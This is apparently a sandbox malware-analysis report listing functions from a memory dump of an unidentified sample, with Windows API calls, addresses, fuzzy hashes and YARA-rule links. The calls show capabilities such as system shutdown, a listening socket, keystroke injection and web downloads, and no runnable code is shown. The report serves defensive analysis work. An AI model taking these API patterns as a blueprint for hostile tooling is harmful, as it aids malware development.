Part of subcall function 00D7BEC3: GetLastError.KERNEL32 ref: 00D7BF49

ExitWindowsEx.USER32(?,00000000), ref: 00D8830C

Strings

SeShutdownPrivilege, xrefs: 00D882DA
, xrefs: 00D882FA
@, xrefs: 00D882FF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: bea38faef56d385eb61e99884c10b69ff3340a5c3b86f0dabd2343bf341b8510
Instruction ID: 8194ef7593ffae7305edd33a986d657f0a8f59dd548ef1b3d93cba153697a144
Opcode Fuzzy Hash: bea38faef56d385eb61e99884c10b69ff3340a5c3b86f0dabd2343bf341b8510
Instruction Fuzzy Hash: 7001A771650316ABE76836789C4AFBB7658DB11F91F580425F953D11D1EE609C00A3B4

Function 00D991DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00D99235
WSAGetLastError.WS2_32(00000000), ref: 00D99244
bind.WS2_32(00000000,?,00000010), ref: 00D99260
listen.WS2_32(00000000,00000005), ref: 00D9926F
WSAGetLastError.WS2_32(00000000), ref: 00D99289
closesocket.WS2_32(00000000), ref: 00D9929D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 245b60b8e09309d40f5ed10e2a3aa9b36adb405caa328b17db652908137fecb6
Instruction ID: 4aee355aedeca4f78c36052ba8f9d4cd4961fe389899513ae94bed8a2678fcef
Opcode Fuzzy Hash: 245b60b8e09309d40f5ed10e2a3aa9b36adb405caa328b17db652908137fecb6
Instruction Fuzzy Hash: 94217A35600201AFCB10EF68CC95B6EB7AAEF44724F148169F956AB3D1DB30AD45CB71

Function 00D4A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON

Download Yara Rule

APIs

Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153

_memmove.LIBCMT ref: 00DB3020
_memmove.LIBCMT ref: 00DB3135
_memmove.LIBCMT ref: 00DB31DC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 1c3e0c1b45f0aa474d4e970e7efab8c780e9af7273e94b0560b8112ea13f9477
Instruction ID: 4820c76ee3a99d294223c35245aea32472f6169b3d10a5c920980871261f508f
Opcode Fuzzy Hash: 1c3e0c1b45f0aa474d4e970e7efab8c780e9af7273e94b0560b8112ea13f9477
Instruction Fuzzy Hash: B3029E71A00209EBDF04DF68C981ABEBBF5EF48340F148069E806DB255EB35DA15DBB5

Function 00D996E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9ACD3: inet_addr.WS2_32(00000000), ref: 00D9ACF5

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00D9973D
WSAGetLastError.WS2_32(00000000,00000000), ref: 00D99760

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 703d66e7262543a031aec8286528dd811cf3a4562d2a46de9e7803596da034f1
Instruction ID: 5c818838aeaaee64cd333d8f678661e365987a2c7be29bbe2e7630a8ed28c717
Opcode Fuzzy Hash: 703d66e7262543a031aec8286528dd811cf3a4562d2a46de9e7803596da034f1
Instruction Fuzzy Hash: 29419E74600201AFDB10AF68CC82E7EB7EAEF44764F14805CF956AB392DA749D058BB1

Function 00D8F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00D8F37A
_wcscmp.LIBCMT ref: 00D8F3AA
_wcscmp.LIBCMT ref: 00D8F3BF
FindNextFileW.KERNEL32(00000000,?), ref: 00D8F3D0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00D8F3FE

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 6ca59de27f7015cafec3fe07abf263f7c53404c430b9b1abf845df521243ec43
Instruction ID: 31a3e7842cebf76a275901f7acd2e44df1105b58321be4b7671e287f6fdbe601
Opcode Fuzzy Hash: 6ca59de27f7015cafec3fe07abf263f7c53404c430b9b1abf845df521243ec43
Instruction Fuzzy Hash: 71418E356047029FCB04EF68C490E9AB7E5FF49324F14416EE95ACB3A1DB31A945CBB1

Function 00D84342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00D8439C
SetKeyboardState.USER32(00000080,?,00000001), ref: 00D843B8
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00D84425
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00D84483

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2555cad77678ad10ed81e681946858394cd725cc38e830181e53b1c6f6c3d3f6
Instruction ID: a4f183dbd2893b3a70b1653705de1aa402d4b8ae88d1e790a95dba31133f3a19
Opcode Fuzzy Hash: 2555cad77678ad10ed81e681946858394cd725cc38e830181e53b1c6f6c3d3f6
Instruction Fuzzy Hash: 464129B094035AAAEF20AB69D804BFE7BB9AB45715F08015AF4C5932C1C7F4C985D771

Function 00DAEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

GetCursorPos.USER32(?), ref: 00DAEFE2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DBF3C3,?,?,?,?,?), ref: 00DAEFF7
GetCursorPos.USER32(?), ref: 00DAF041
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DBF3C3,?,?,?), ref: 00DAF077

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: f5ec4385a999764de10626f62d9786ac026d4ab4ddfd7eef8edaee7a2fd932a5
Instruction ID: 59423673254634cd8150317212ca28234092ee4a2df20733bdde31e338c098ab
Opcode Fuzzy Hash: f5ec4385a999764de10626f62d9786ac026d4ab4ddfd7eef8edaee7a2fd932a5
Instruction Fuzzy Hash: C621B135500118AFCB258F95CC99EEA7BB5EF4A750F0840A9F9059B2A2C3719D51DBB0

Function 00D8220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D8221E

Strings

|, xrefs: 00D8224E
(, xrefs: 00D82264

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 35b3873e47128828eb0fc1b838e12f2db0264051cae96caf4f9305cf84b1ba7d
Instruction ID: cadd743491b77c22a942fe2d027633b05a1f728aa871b12243567f30d811564d
Opcode Fuzzy Hash: 35b3873e47128828eb0fc1b838e12f2db0264051cae96caf4f9305cf84b1ba7d
Instruction Fuzzy Hash: ED322375A007059FCB28DF69C491A6AB7F0FF48320B15C46EE49ADB3A1E770E941CB64

Function 00D5AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00D5AE5E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: d6f3b09d8b56cffc7b2c5fc4241fc7aa46305148dfc9591697311aaa5e831526
Instruction ID: 59bc7174908264665a491473541fd56eba26a5a39c857c296401a1e8e4f9aa80
Opcode Fuzzy Hash: d6f3b09d8b56cffc7b2c5fc4241fc7aa46305148dfc9591697311aaa5e831526
Instruction Fuzzy Hash: ABA12960204225FADF28AB2D5C8ADBF399CDF46342B18472AFC83D6191DE25CD099273

Function 00D9550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00D94A1E,00000000), ref: 00D955FD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00D95629

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 4940a3fceacf7da2d54ac14f896b60fc9c4f179b8e87e11443122997790c1e8d
Instruction ID: e0d38692d7a424499230af1271f9cecf5e1d661e81de47fe672624f19c2092c9
Opcode Fuzzy Hash: 4940a3fceacf7da2d54ac14f896b60fc9c4f179b8e87e11443122997790c1e8d
Instruction Fuzzy Hash: 9741F271600609BFEF129E90EC85EBFB7BDEB40318F14407AF606A6185EA709E419B74

Function 00D8EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D8EA95
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D8EAEF
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00D8EB3C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e78d65792922c2c717792054fe14a4ce14db7724a6f3968ea00a1e4aa1df9e91
Instruction ID: 24489b02c63fd10aac0e704a738f647cc65b98c1b48d6d34edf2b00f133dcea6
Opcode Fuzzy Hash: e78d65792922c2c717792054fe14a4ce14db7724a6f3968ea00a1e4aa1df9e91
Instruction Fuzzy Hash: 2C213B35A00209EFCB00EFA5D894AADFBB9FF49310F1480A9E805E7351DB31E905CB60

Function 00D870AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D870D8
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00D87115
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D8711E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 499c9722326c8014de564b3fcc8b4eb2de6e0c19b06d665d5db3b72f80f8f7c5
Instruction ID: 0ecc60a66f7de3367bc45c87da60758ecf4ce6b9c4f6255fb22906bb7e414efa
Opcode Fuzzy Hash: 499c9722326c8014de564b3fcc8b4eb2de6e0c19b06d665d5db3b72f80f8f7c5
Instruction Fuzzy Hash: 6111A5B190032ABEE7109BA8DC49FAFB7BCEB08754F104555B901E7190D2789E0487F1

Function 00D46670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D467D0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 394856d6c2ae8cc576fc7e0fb0418e6327c358d1a3a7adabfaf7610038241a13
Instruction ID: 06ec81697ef299308b440636e18e71477f30c09c8d74c4becb6b2f274fbd9330
Opcode Fuzzy Hash: 394856d6c2ae8cc576fc7e0fb0418e6327c358d1a3a7adabfaf7610038241a13
Instruction Fuzzy Hash: E9A21975E0121ACFCB24CF58C480AADBBB1FF49314F29815AE85AAB390D774DD81DB61

Function 00D5AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166

GetParent.USER32(?), ref: 00DBF4B5
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00D5ADDD,?,?,?,00000006,?), ref: 00DBF52F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 00fa3061d169c48eb8971035dfb80aac9f06090f17f39610bd3803fcaa96ed52
Instruction ID: 7f57aba4132359b4a814b1885becf6267ddd4457c8545e5a2febf986855cef80
Opcode Fuzzy Hash: 00fa3061d169c48eb8971035dfb80aac9f06090f17f39610bd3803fcaa96ed52
Instruction Fuzzy Hash: 29216131600104AFCF289F2CCC49EAA3BA6EB46371F184265FD2A5B2E2C7319E55D730

Function 00DAF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00DBF352,?,?,?), ref: 00DAF115

Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00DAF0FB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 4d5b192fa86e82db21bb84ca18b63e03889826c304a20a39d200669e3c240ea4
Instruction ID: 8ef6ee1302844dbf03c4bb039407d13b70d76bccec28ce917bcf15829067b6b7
Opcode Fuzzy Hash: 4d5b192fa86e82db21bb84ca18b63e03889826c304a20a39d200669e3c240ea4
Instruction Fuzzy Hash: 0801B131200304EBCB259F54DC85F6A3BA6FB86364F1841A8F85A5B2E1C7329846DB70

Function 00DAF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DAF47D
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00DBF42E,?,?,?,?,?), ref: 00DAF4A6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

